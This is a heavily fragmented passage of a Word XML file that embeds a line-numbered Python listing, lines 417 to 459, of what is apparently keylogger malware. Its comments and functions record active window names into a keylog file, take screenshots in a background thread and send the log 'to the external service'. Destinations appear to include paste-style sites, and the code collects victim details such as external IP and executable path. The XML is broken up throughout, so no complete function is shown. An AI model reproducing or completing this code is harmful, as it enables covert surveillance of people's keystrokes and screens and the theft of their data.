          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">417  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="764"/>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rnalip=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">extern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5" w:name="l418"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">418  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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ecutable=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">exec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6" w:name="l419"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">419  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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nsion=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">extensio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7" w:name="l420"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">420  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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rive=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">driveuni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8" w:name="l421"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">421  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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elfpathandfilename=' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s2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9" w:name="l422"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">422  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="76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0" w:name="l423"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">423  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="77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END]'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1" w:name="l424"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">424  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="771"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="772" w:name="l425"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">425  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="772"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="773" w:name="l426"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">426  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="773"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Save the name of the active window and add it to the keylog file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="774" w:name="l427"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">427  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="774"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>register_window_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>tex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75" w:name="l428"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">428  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="775"/>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76" w:name="l429"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">429  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="77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WINDOW NAME] ' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">tex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7" w:name="l430"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">430  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="77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Window Name : {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="778" w:name="l431"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">431  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="778"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="779" w:name="l432"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">432  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="779"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="780" w:name="l433"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">433  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="780"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Take a screenshot, add the name to the keylog file and then start a thread for recording to disk and send</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="781" w:name="l434"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">434  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="781"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># it to the external service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="782" w:name="l435"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">435  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="782"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>capture_screen</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83" w:name="l436"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">436  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="783"/>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784" w:name="l437"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">437  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="784"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>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screenshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="785" w:name="l438"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">438  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="785"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="786" w:name="l439"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">439  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="786"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>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 xml:space="preserve">SCR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S"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>SCREXT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="787" w:name="l440"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">440  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="78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SCREENSHOT] ' </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>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88" w:name="l441"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">441  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="788"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">pantalla </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ScreenShootThread</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789" w:name="l442"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">442  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="789"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>threadList</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pantalla</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="790" w:name="l443"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">443  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="790"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>pantalla</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791" w:name="l444"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">444  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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92" w:name="l445"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">445  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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creenshot disabled. No capturing'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="793" w:name="l446"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">446  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="793"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="794" w:name="l447"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">447  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="794"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="795" w:name="l448"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">448  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="795"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Execute the necessary actions to send the keylog file to the different resources or services that have been defined.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="796" w:name="l449"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">449  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="796"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def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97" w:name="l450"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">450  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="797"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>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798" w:name="l451"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">451  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="79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bin...'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="799" w:name="l452"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">452  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="799"/>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BIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="800" w:name="l453"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">453  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="80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1" w:name="l454"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">454  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="801"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="802" w:name="l455"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">455  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="802"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>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803" w:name="l456"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">456  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="80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code...'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="804" w:name="l457"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">457  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="804"/>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CODE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="805" w:name="l458"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">458  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="80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6" w:name="l459"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">459  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="806"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
